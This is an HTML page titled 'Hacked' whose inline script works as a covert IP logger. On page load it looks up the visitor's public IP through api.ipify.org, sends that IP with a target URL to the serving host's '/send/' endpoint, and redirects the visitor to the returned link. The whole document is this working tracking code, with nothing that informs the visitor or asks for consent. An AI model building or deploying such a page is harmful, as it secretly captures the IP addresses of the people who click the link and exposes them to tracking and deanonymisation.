<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Hacked</title>
</head>
<body>

<script>
    document.addEventListener('DOMContentLoaded', async () => {
        let link = location.href.substring(31, location.href.length);
        let ip = await getIp();
        console.log(ip);
        location.href = await sendReq(ip, link);
    });

    const sendReq = async (ip, link) => {
        const resp = await fetch("/send/" + ip.ip + "?url=" + link);
        console.log(resp)
        return resp.text();
    }

    const getIp = async () => {
        try {
            const res = await fetch("https://api.ipify.org/?format=json");
            return await res.json();
        } catch (error) {
            return error;
        }
    };

</script>
</body>
</html>
